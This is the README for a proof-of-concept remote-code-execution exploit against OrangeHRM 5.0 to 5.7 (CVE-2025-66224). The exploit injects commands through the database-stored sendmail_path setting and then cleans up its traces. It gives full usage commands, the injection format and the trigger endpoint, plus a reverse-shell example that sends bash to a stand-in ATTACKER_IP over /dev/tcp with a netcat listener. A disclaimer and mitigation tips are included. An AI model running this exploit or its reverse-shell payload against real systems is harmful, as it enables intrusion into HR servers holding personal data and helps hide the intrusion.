# OrangeHRM RCE Exploit - CVE-2025-66224

## 📋 Description

This Proof of Concept (PoC) demonstrates a Remote Code Execution (RCE) vulnerability in OrangeHRM through command injection in the `sendmail_path` configuration parameter.

The exploit works by:
1. Injecting a malicious payload into the MySQL database (`hs_hr_config` table)
2. Triggering the payload execution via the email configuration API endpoint
3. Automatically restoring the original value to clean up traces

## 🎯 Affected Versions

- OrangeHRM version 5.0 to 5.7

## ⚠️ Disclaimer

This tool is provided for **educational and authorized security testing purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse or damage caused by this tool.

## 🔧 Requirements

```bash
pip install requests mysql-connector-python
```

## 📦 Installation

```bash
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt
```

## 🚀 Usage

### Step 1: Obtain Session Cookie

1. Log in to OrangeHRM through the web interface
2. Open browser Developer Tools (F12)
3. Navigate to **Storage** > **Cookies** (Firefox) or **Application** > **Cookies** (Chrome)
4. Copy the `_orangehrm` cookie value

### Step 2: Run the Exploit

```bash
python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \
    -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \
    -cmd '<COMMAND_TO_EXECUTE>'
```

### Example - Simple Command

```bash
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"
```

### Example - Reverse Shell

```bash
# Start listener on attacker machine
nc -lvnp 4444

# Execute exploit with reverse shell payload
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```

## 📝 Parameters

| Parameter | Short | Required | Description |
|-----------|-------|----------|-------------|
| `--target` | `-t` | ✅ | Target URL (e.g., http://target.com) |
| `--cookie` | `-c` | ✅ | Session cookie value |
| `--cookie_name` | `-cn` | ❌ | Cookie name (default: _orangehrm) |
| `--command` | `-cmd` | ✅ | Command to execute on target |
| `--db_host` | `-dh` | ✅ | MySQL host address |
| `--db_user` | `-du` | ✅ | MySQL username |
| `--db_pass` | `-dp` | ✅ | MySQL password |
| `--db_port` | `-dport` | ❌ | MySQL port (default: 3306) |

## 🔍 How It Works

### Vulnerability Details

The vulnerability exists in the email configuration functionality where the `sendmail_path` parameter is stored in the database and later executed without proper sanitization.

**Exploitation Flow:**

```
1. Authenticate to OrangeHRM (obtain valid session cookie)
   ↓
2. Connect to MySQL database
   ↓
3. Locate hs_hr_config table
   ↓
4. Update email_config.sendmail_path value:
   FROM: /usr/sbin/sendmail -bs
   TO:   /usr/sbin/sendmail -bs && <PAYLOAD> #
   ↓
5. Trigger execution via API:
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. Command executes on server
   ↓
7. Restore original value (cleanup)
```

### Technical Details

**Vulnerable Parameter:** `email_config.sendmail_path`

**Database:** 
- Table: `hs_hr_config`
- Column: `name` = 'email_config.sendmail_path'
- Column: `value` = sendmail command path

**Trigger Endpoint:** 
```
PUT /web/index.php/api/v2/admin/email-configuration
```

## 🛡️ Mitigation

1. **Input Validation:** Implement strict validation for the `sendmail_path` parameter
2. **Escaping:** Properly escape shell commands before execution
3. **Least Privilege:** Run web server with minimal privileges
4. **Update:** Apply the latest security patches for OrangeHRM

## 🤝 Credits

**PoC by:** RiccK

**Team:** Bypassadores && HackersOnSteroids

## 🔗 References

- [CVE-2025-66224](https://nvd.nist.gov/vuln/detail/CVE-2025-66224)

---

**⚠️ Use responsibly. Always obtain proper authorization before testing.**
